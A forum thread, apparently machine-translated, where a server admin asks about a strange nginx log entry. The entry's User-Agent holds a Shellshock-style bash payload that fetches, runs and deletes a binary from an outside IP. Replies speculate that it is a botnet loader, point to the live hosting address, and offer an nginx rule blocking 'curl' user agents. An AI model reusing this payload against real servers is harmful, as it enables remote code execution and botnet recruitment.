nginx - Questions about using user-agent to attack
世界只因有你
世界只因有你 2017-05-16 17:10:16
0
3
674

Today I accidentally discovered a very strange log in the access.log of nginx on the company server:

61.136.82.154 - - [07/Jan/2017:02:27:26 +0000] "GET / HTTP/1.0" 200 3770 "-" "() { :;}; /bin/bash -c \x22curl -o /tmp/mig http://37.1.202.6/mig;/usr/bin/wget http://37.1.202.6/mig -O /tmp/mig;chmod +x /tmp/mig;/tmp/mig;rm -rf /tmp/mig*\x22" "-"

When it comes to strange places:

  1. is using http1.0

  2. user-agent is a script

I searched around the Internet and found no information about using user-agent to attack. Although I can get the script code by following the address in the log, my ability is limited and I cannot analyze its attack target. .

Excuse me, any experts, do you have relevant information and experience? Please share it with me, thank you very much! !

Replenish:

Under what configuration conditions of nginx will it parse the content in user-agent?

世界只因有你
世界只因有你

reply all(3)
阿神

This should be http1.0user-agent漏洞,你的服务器可能被对方注入脚本,他在你上面伪装了一个apache的服务,把你的服务器搞成了肉鸡,并操纵他进行DDOS攻击,但是我不知道nginxWill this script be executed?

You can look at you

You can look at this code. access.loghttp://37.1.202.6/mig这个地址。可以看到有个a文件http://37.1.202.6/a

滿天的星座

Scanner injected. . . User-Agent will be parsed.
1. Install application firewall
2. Configure Nginx

`
if ($http_user_agent ~* 'curl') #Configure the rejected user_agent.
{
return 403;
}
`

过去多啦不再A梦

One paragraph perl 脚本,作用就是 伪装成 Apache

Then accept instructions to do something. . . That's right, catching broilers.

Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template